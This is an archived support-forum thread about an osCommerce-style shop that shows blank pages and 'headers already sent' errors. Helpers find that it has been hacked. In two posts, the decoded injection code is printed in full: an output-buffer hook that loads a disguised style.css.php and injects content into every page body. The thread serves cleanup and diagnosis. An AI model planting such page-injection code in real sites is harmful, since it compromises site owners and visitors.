twincactus Posted May 5, 2010 Share Posted May 5, 2010 My site renders fine in Firefox, but in Internet Explorer it looks like the style sheet is not being applied. You can see for yourself at www.tbirdammo.com. I also have a problem where some pages turn up blank. The site was working fine and then some time later I started getting the blank pages. Now, I have the blank pages as well as the garbled ie problem. Below is an excerpt from my Apache log: [Tue May 04 16:44:53 2010] [error] [client 192.168.2.7] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/sessions.php on line 103, referer: http://tbirdammo.com/catalog/admin/index.php [Tue May 04 16:44:53 2010] [error] [client 192.168.2.7] PHP Warning: Cannot modify header information - headers already sent by (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/general.php on line 23, referer: http://tbirdammo.com/catalog/admin/index.php [Tue May 04 16:48:04 2010] [error] [client 192.168.2.7] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/sessions.php on line 103, referer: http://tbirdammo.com/catalog/admin/login.php [Tue May 04 16:48:04 2010] [error] [client 192.168.2.7] PHP Warning: Cannot modify header information - headers already sent by (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/general.php on line 23, referer: http://tbirdammo.com/catalog/admin/login.php [Tue May 04 16:48:11 2010] [error] [client 192.168.2.7] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/admin/includes/application_top.php:1) in /usr/local/www/data/catalog/admin/includes/functions/sessions.php on line 103, referer: http://tbirdammo.com/catalog/admin/login.php [Tue May 04 16:49:06 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html [Tue May 04 16:49:06 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html [Tue May 04 16:49:51 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html [Tue May 04 16:49:51 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html [Tue May 04 16:53:24 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html [Tue May 04 16:53:24 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html [Tue May 04 16:53:33 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cookie - headers already sent by (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/local/www/data/catalog/includes/functions/sessions.php on line 102, referer: http://tbirdammo.com/Thunderbird%20Cartridge%20Company,%20Inc..html [Tue May 04 16:53:33 2010] [error] [client 192.168.2.45] PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /usr/local/www/data/catalog/includes/application_top.php:1) in /usr/loca Can anyone give me some direction as to where to start? I have many items I don't want to lose otherwise I would just reload the whole thing. Thanks, -Tim Link to comment Share on other sites More sharing options...
germ Posted May 5, 2010 Share Posted May 5, 2010 From what I can see you've been hacked. :'( Read this If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
MrPhil Posted May 5, 2010 Share Posted May 5, 2010 The error messages tell you that your application_top.php file is sending something to the browser on or near line 1. It shouldn't send anything. Check for code added to the top of your application_top.php file. Did someone edit this recently? Maybe they left a stray blank before the opening <?php. Did you add <?xml version="1.0" encoding="UTF-8"?> ? I think that IE is known to get ill trying to handle an xml line like that. Try removing the line and see if it makes any difference. I ran the page through the W3C validator, and there were no serious problems (just missing alt attributes on images). If you still have "blank screen" problems after clearing up the IE problem, read http://www.catskilltech.com/freeSW/SMF/faqs > "Blank page/WSOD" and see if you can find out where the error is occurring. Also, file names with blanks in them are always a bad idea. Consider renaming with underscores (and Inc. to just Inc). That might also be giving IE fits. By the way, which version of IE are you trying this on? Link to comment Share on other sites More sharing options...
germ Posted May 5, 2010 Share Posted May 5, 2010 The hack code decods to this: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){ $GLOBALS['sh_no']=1; if(file_exists('/usr/local/www/data/catalog/admin/includes/languages/english/images/buttons/style.css.php')){ include_once('/usr/local/www/data/catalog/admin/includes/languages/english/images/buttons/style.css.php'); if(function_exists('gml')&&!function_exists('dgobh')){ if(!function_exists('gzdecode')){ function gzdecode($R20FD65E9C7406034FADC682F06732868){ $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1)); $R60169CD1C47B7A7A85AB44F884635E41=10; $R0D54236DA20594EC13FC81B209733931=0; if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){ $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2)); $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1]; $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){ $R60169CD1C47B7A7A85AB44F884635E41+=2; } $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41)); if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){ $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868; } return $RC4A5B5E310ED4C323E04D72AFAE39F53; } } function dgobh($RDA3E61414E50AEE968132F03D265E0CF){ Header('Content-Encoding: none'); $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF); if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){ return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90); } else{ return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh'); } } } I posted it because it gives you a location of one of the hack files: /catalog/admin/includes/languages/english/images/buttons/style.css.php If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
twincactus Posted May 5, 2010 Author Share Posted May 5, 2010 Looks like the hack. Is it possible to just replace all the php files with new ones without doing a complete reinstall? My backup is also infected. I have cleaned the source files out but all the files still have the junk above the other code that needs to be cleaned. I would like to replace them with a clean copy from a clean download of 2.2rca. Of course I believe there will be some configuration files I would have to manually clean but cleaning those would be small compared to cleaning all of the php files. Which files hold the configs I need to save? Sorry guys, but I have not had much experience yet with this php product. Thanks a bunch for the help! -Tim Link to comment Share on other sites More sharing options...
twincactus Posted May 5, 2010 Author Share Posted May 5, 2010 The hack code decods to this: if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){ $GLOBALS['sh_no']=1; if(file_exists('/usr/local/www/data/catalog/admin/includes/languages/english/images/buttons/style.css.php')){ include_once('/usr/local/www/data/catalog/admin/includes/languages/english/images/buttons/style.css.php'); if(function_exists('gml')&&!function_exists('dgobh')){ if(!function_exists('gzdecode')){ function gzdecode($R20FD65E9C7406034FADC682F06732868){ $R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1)); $R60169CD1C47B7A7A85AB44F884635E41=10; $R0D54236DA20594EC13FC81B209733931=0; if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){ $R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2)); $R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1]; $R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){ $R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1; } if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){ $R60169CD1C47B7A7A85AB44F884635E41+=2; } $RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41)); if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){ $RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868; } return $RC4A5B5E310ED4C323E04D72AFAE39F53; } } function dgobh($RDA3E61414E50AEE968132F03D265E0CF){ Header('Content-Encoding: none'); $R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF); if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){ return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90); } else{ return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh'); } } } I posted it because it gives you a location of one of the hack files: /catalog/admin/includes/languages/english/images/buttons/style.css.php Thanks, I got this one and several others in that folder. Are there more? -Tim Link to comment Share on other sites More sharing options...
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.